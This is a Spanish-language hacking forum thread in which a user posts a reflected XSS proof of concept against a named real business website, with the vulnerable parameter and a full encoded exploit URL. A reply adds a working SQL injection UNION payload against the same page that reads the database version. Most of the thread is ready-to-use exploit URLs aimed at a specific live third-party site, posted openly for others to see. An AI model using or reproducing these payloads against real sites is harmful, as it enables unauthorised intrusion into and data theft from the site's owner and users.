Captura de pantalla
(https://i.imgur.com/ZSqRz1Y.png)
Url del sitio
- http://www.dynastybuilders.ca
Vector
- Archivo y Parametro: custom-gallery.php?id=
- Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
- PoC:
----> http://www.dynastybuilders.ca/custom-gallery.php?id=33%27%22%3E%3Cscript%3Ealert(/Drok3r%20-%20XSS%20/)%3C/script%3E (http://www.dynastybuilders.ca/custom-gallery.php?id=33%27%22%3E%3Cscript%3Ealert(/Drok3r%20-%20XSS%20/)%3C/script%3E)
Autor
[!] Drok3r (redbirdTEAM - CiberSecurityRECON)
Reportado: SI
¡Hola Drok3r!
Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.
Payload: http://www.dynastybuilders.ca/custom-gallery.php?id=' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -
¡Saludos!
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
¡Hola Drok3r!
Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.
Payload: http://www.dynastybuilders.ca/custom-gallery.php?id=' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -
¡Saludos!
Aaaa que cosas.... jeje Gracias por el dato.